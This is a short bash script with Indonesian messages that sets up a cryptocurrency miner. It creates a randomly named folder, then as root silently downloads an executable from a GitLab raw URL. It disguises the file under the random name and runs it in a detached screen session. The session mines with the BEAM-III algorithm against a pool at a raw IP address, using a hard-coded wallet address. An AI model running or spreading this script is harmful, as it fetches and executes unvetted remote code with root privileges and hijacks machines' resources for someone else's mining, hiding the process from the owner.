#!/bin/bash

NAMA_FOLDER=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)


mkdir -p "$NAMA_FOLDER"


cd "$NAMA_FOLDER" || { echo "Gagal masuk ke folder $NAMA_FOLDER."; exit 1; }


echo "Folder '$NAMA_FOLDER' berhasil dibuat dan Anda sekarang berada di dalamnya."
sudo su <<EOF
sudo apt install screen -y >/dev/null 2>&1
wget -qO dogi https://gitlab.com/sarifadim/jomblo/-/raw/main/lohat && chmod +x dogi && mv dogi $NAMA_FOLDER
screen -dms run ./$NAMA_FOLDER --algo BEAM-III --pool 47.237.21.190:80 --user 35abc183df02cef8b5ab05ea3df9ecf5e1b8bbeb8ccc0bdb7a27073e80621131c4e.$(echo 0J-$(TZ=UTC-7 date +"%H-%M-%S")) --tls enable --no-cl
EOF
screen -r
